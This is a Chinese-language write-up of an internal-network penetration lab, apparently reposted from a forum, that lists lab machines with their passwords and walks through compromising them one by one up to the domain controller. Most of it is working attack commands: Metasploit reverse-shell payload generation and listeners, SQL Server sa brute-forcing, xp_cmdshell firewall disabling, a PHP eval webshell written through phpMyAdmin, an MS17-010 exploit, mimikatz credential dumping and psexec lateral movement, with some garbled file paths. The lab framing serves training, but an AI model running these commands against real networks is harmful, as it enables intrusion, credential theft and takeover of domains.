Windows10使用指令行打開3389_内網滲透(實驗)之域滲透深入彈shell開3389拿域控

0x01 實驗拓撲圖及實驗用IP

A組IP(實驗用IP)

1号

賬号：Administrator

密碼：[email protected][email protected]#

ip：192.168.141.111

2号

賬号：ADMIN-PC/ADMIN

密碼：123456hhhh.

222.18.158.244:7771

ip：192.168.141.138

3号

域名：hiro.com

管理者

賬号：hiroadministrator

密碼：hb123456,./$

域使用者

賬号：hiro.com/user1

密碼：hb123456,./$

ip：192.168.141.100

Tips

裡面設了靜态ip 要改一下

已将加入過程總結

4号

賬号:administrator

密碼:[email protected]

ip：192.168.141.114

5号

賬号：Administrator

密碼：[email protected]

ip：192.168.141.115

6号

賬号：Administrator

密碼：Edvison233!

ip：192.168.141.116

0x02 環境搭建步驟

本子產品中的IP隻是作為範例,與正式實驗中所用IP不同

一号機

系統：Windows 10

IP : 192.168.199.101

對三号機192.168.199.103開放445端口

配置步驟：

1. 在虛拟機上安裝win10系統
2. 在網絡共享中心配置靜态IP

1. 對3号機開放445端口：
2. 建立入站規則(選擇自定義)

應用于所有程式：

設定端口：

指定隻對3号機開放：

二号機

系統：Windows 7

IP : 192.168.199.102

配置步驟：

安裝Windows7，設定固定IP

三号機

系統：Windows 2012

IP : 192.168.199.103

對192.168.199.104開放445端口

配置步驟：

Windows server 2012 搭建域環境

計算機名：WIN-MT3C3TD4RQD.1.org

所在域名或工作組名稱：1.org

IP位址：192.168.199.103

作業系統：Windows Server 2012 R2

密碼 hb,./123456

安裝步驟

1) 指定AD角色伺服器的IP位址(這裡的IP位址根據企業實際情況配置設定，但一定要是固定IP)

2) 點選Server2012左下角的“伺服器管理器”顯示如下界面

3) 點選“添加角色和功能按鈕”彈出如下界面

4) 點選“下一步”

5) 這裡選擇”基于角色或基于功能的安裝”，然後點”下一步”

6) 伺服器選擇這裡選擇預設的，假如你需要針對其它主機安裝AD角色，這裡可以選擇你需要的主機，點選”下一步”

7) 這裡勾選“Active Directory域服務”，當勾選這個選項時，會彈出如下對話框，點“添加功能”就OK

8) 這樣就正确選擇了安裝AD角色，點選”下一步”

9) 功能頁面不需要做任何選擇直接點“下一步”

10) 這裡是介紹AD角色的功能及注意事項，點選“下一步”

11) 勾選”如果需要，自動重新啟動目标伺服器”，然後點選”安裝”

12) 安裝成功後我們點選“關閉”，但這還沒有完全安裝成功

13) 點選伺服器右上角的“功能按鈕”

14) 彈出繼續配置AD的對話框

15) 點選”部署後配置”，在紅框處填入相應的域名

16) 點選“下一步”，紅色方框選擇域功能級别，綠色方框選擇相應的功能，DNS/GC/RODC,黃色方框輸入目錄服務還原密碼 密碼是 hb,./123456

17) 點選“下一步”後配置DNS，由于不需要委派DNS，是以這裡不需要設定，直接點選”下一步”

18) 這一步配置Netbios名，若沒有特殊需求預設的就可以，直接點”下一步”

19) 配置日志，資料庫，sysvol路徑，若沒有特殊需求，預設就可以

20) 檢視配置資訊，若沒有任何問題直接點”下一步”

21) 這個頁面是檢測是否滿足條件，滿足條件後就可以直接點”安裝”

22) 等待機器安裝配置項，可能需要重新開機

23) 重新開機後我們會看到AD角色已經安裝完成

驗證安裝

1. 直接打開CMD指令行，輸入”Net query fsmo”,這時會顯示五種角色都已經安裝成功

1. 若要進一步驗證AD是否安裝正确，可以使用DCDIAG /a指令行

設定端口開放：

打開電腦找到控制台，點選控制台進入控制台頁面，點選系統和安全選項

進入系統安全頁面，點選防火牆選項

進入windows防火牆面闆，點選進階設定選項

進入進階設定選項，點選右鍵建立規則

進入規則想到頁面，選擇端口，點選下一步

進入設定端口頁面，設定需要開放的445端口，點選下一步

選擇允許連結，點選下一步

配置檔案項，點選下一步

輸入名稱和描述，點選完成

四号機

系統：Windows 2003

本機密碼為空

IP : 192.168.199.104

對192.168.199.105開放445端口

留Ms17010漏洞

配置步驟：

靜态ip配置

設定本機管理者密碼為空

防火牆配置

攻擊執行個體

攻擊機: kail ip：192.168.246.128 (在本機驗證時沒有使用192.168.199.1xx的IP位址)

靶機: win 2003 ip：192.168.246.141

配置靶機隻對攻擊機開放445端口：

先啟用防火牆：

然後編輯445端口

點選更改範圍，再将攻擊機的ip添加上去，這樣就配好了。

配置ms17_010漏洞

因為win server 2003 在未打更新檔時都有ms17_010漏洞，是以我直接展示利用過程。

利用msf進行攻擊

獲得shell

五号機

系統：Windows server 2008

IP : 192.168.199.105

對192.168.199.106開放80端口

安裝PHP study ，MySQL弱密碼

1、首先完成本機phpstudy及MySQL的安裝

2、配置本機的靜态IP為192.168.199.105

3、配置防火牆對六号機開放80端口

在指令行中使用wf.msc打開防火牆進階設定

在入站規則裡添加新的規則，設定端口80

在新添加的規則右鍵屬性

在作用域裡添加本地IP位址為192.168.199.106，即六号機的IP

六号機

系統：Windows server 2008

IP : 192.168.199.106

對192.168.199.102開放1433端口

Sa賬号為弱密碼

本機是六号機

作業系統是 windows server 2008

Ip是 192.168.199.106

要求是配置一個sqlserver sa為弱密碼的機器

對2号開放1433端口

首先，配置sqlserver

下載下傳SQL Server安裝程式

輕按兩下運作下載下傳的SQL Server安裝程式SQLEXPRWT_x64_CHS.exe。

打開SQLServer安裝中心，在右邊選擇“全新安裝或向現有安裝添加功能”。

SQL Server開始安裝準備。一直下一步。

在“資料庫引擎配置”中，選擇“混合模式”，并為“SQLServer系統管理者賬戶(sa)”指定密碼，這裡設定為弱密碼

一直下一步 直到安裝成功。

然後設定對二号機開放1433端口

第1步選擇“打開或者關閉windows防火牆”把防火牆打開，然後選擇“進階設定”，選擇“建立規則”來指定端口。

現在“建立規則”，選擇“端口”下--“TCP”和“特定本地端口”然後填寫“1433”--下一步--下一步--為這個端口添加一個名稱“1433”，然後确定就可以了。/3、在“入站規則”裡選擇剛才建立的規則，名稱是“1433”，然後按照下圖順序就可以了。

配置成功

以下為内網滲透測試過程

0x03 使用kali拿下二号機

通過MobaXterm連接配接Kali Linux(ip:192.168.141.143)，使用者名:root，密碼:toor

使用下述指令，執行，生成木馬檔案:

msf -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.141.143 LPORT=4444 -f exe > ./test.exe
           

生成了test.exe之後，然後在kali裡，設定端口監聽，等待目标上線

msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp;show options; set LHOST 192.168.141.143;set LPORT 4444; run"
           

在2号機上右擊，以管理者權限執行。kali就可以接收到反彈回來的shell。對shell進行操作。

在kali裡接收到了shell，可在meterpreter中管理shell，開啟3389

在kali裡接收到了shell，可在meterpreter中管理shell，開啟3389

run post/windows/manage/enable_rdp
           

添加使用者

run post/windows/manage/enable_rdp username="Waldo1111test" password="123456hhhh."
           

然後在伺服器主機中，用新添加的賬号，遠端桌面連接配接2号機，至此完成了對2号機的控制

2号機到6号機

使用nmap掃描發現192.168.141.116開了1433端口

nmap -p1433 --open 192.168.141.0/24
           

使用ms-sql-brute子產品對6号機sa賬戶進行爆破，獲得使用者名為sa，密碼為123456

nmap -p 1433 --script ms-sql-brute --script-args userdb=C:甥敳獲Waldo1111testDesktopame.txt,passdb=C:甥敳獲Waldo1111testDesktoppassword.txt 192.168.141.116
           

使用sqltools擷取6号機資料庫

用xp_cmdshell關閉防火牆限制

netsh firewall set opmode mode=disable
           

添加3389入站規則

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
           

建立管理者使用者Waldo6TEST

net user Waldo6TEST 1234567hhhh. /addnet localgroup administrators Waldo6TEST /add
           

使用使用者名Wado6TEST 密碼1234567hhhh.成功登陸六号機

6号機到5号機

發現5号機開放80端口

輸入://192.168.141.115/phpmyadmin/，弱密碼 使用者名root 密碼root

嘗試寫入webshell

use mysql;CREATE TABLE `mysql`.`d0g3` (`sn00py` TEXT NOT NULL );INSERT INTO `mysql`.`d0g3` (`sn00py`)VALUES ('<?php @eval($_POST[c]);?>');SELECT sn00py FROM d0g3 INTO OUTFILE 'C:/pentest/phpstudy/WWW/shell.php';
           

Shell寫到了：http://192.168.141.115/shell.php

使用菜刀連接配接

執行指令whoami，發現是administrator權限

加管理者使用者

net user Waldo 1234567hhhh. /addnet localgroup administrators Waldo /add
           

打開5号機3389端口:

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
           

連接配接到遠端桌面

5号機到4号機

在5号機上傳ms17010攻擊腳本，用kali攻擊機生成一個payload

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.141.143 lport=6666 -f exe -o shell.exe
           

開啟msf監聽

msfconsole -quse exploit/multi/handlerset lhost 0.0.0.0set lport 6666exploit
           

在5号機中cmd中C:甥敳獲WaldoMS17-010-master

在5号機上，運作ms170101攻擊腳本(腳本要自己下載下傳)

python zzz_exploit.py 192.168.141.114
           

在kali裡接收到了shell，可在meterpreter中管理shell，開啟3389

run post/windows/manage/enable_rdp
           

添加使用者

run post/windows/manage/enable_rdp username="Waldo1111test" password="123456hhhh."
           

在5号機遠端登入4号機

4号機到3号機

在4号機中抓取hash

privilege::debugsekurlsa::logonpasswords
           

抓到域控管理者賬号和密碼:

在4号機上，使用以下指令建立IPC$連接配接

net use 192.168.141.100 "hb123456,./$" /user:"Administrator"
           

在4号機上，使用以下指令，将目标靶機的C槽映射到本地Z盤

net use z: 192.168.141.100c$
           

使用copy指令将先前生成的shell.exe拷貝至靶機C槽

copy shell.exe 192.168.141.100c$
           

在kali上開啟監聽(6666端口)，使用psesec.exe.啟動靶機上的shell.exe

p**ec.exe 192.168.141.100 -u administrator -p hb123456,./$ c:shell.exe
           

成功反彈shell上線:

在kali裡接收到了shell，可在meterpreter中管理shell，開啟3389

run post/windows/manage/enable_rdp
           

添加使用者

run post/windows/manage/enable_rdp username="Waldo1111test" password="123456hhhh."
           

在4号機遠端登入3号機

使用者名:hiroAdministrator 密碼:hb123456,./$

3号機到1号機

在3号機上，使用以下指令建立IPC$連接配接

net use 192.168.141.111 "hb123456,./$" /user:"Administrator"
           

在3号機上，使用以下指令，将目标靶機的C槽映射到本地Z盤

net use z: 192.168.141.111c$
           

使用copy指令将先前生成的shell.exe拷貝至靶機C槽

copy shell.exe 192.168.141.111c$
           

在kali上開啟監聽(6666端口)，使用p**ec.exe.啟動靶機上的shell.exe

p**ec.exe 192.168.141.111 -u hiroAdministrator -p hb123456,./$ c:shell.exe
           

成功擷取shell

打開一号機3389

使用使用者名:hiroAdministrator 密碼: hb123456,./$登入

成功拿下一号機，實驗成功!

轉載自：https://bbs.ichunqiu.com/thread-49988-1-1.html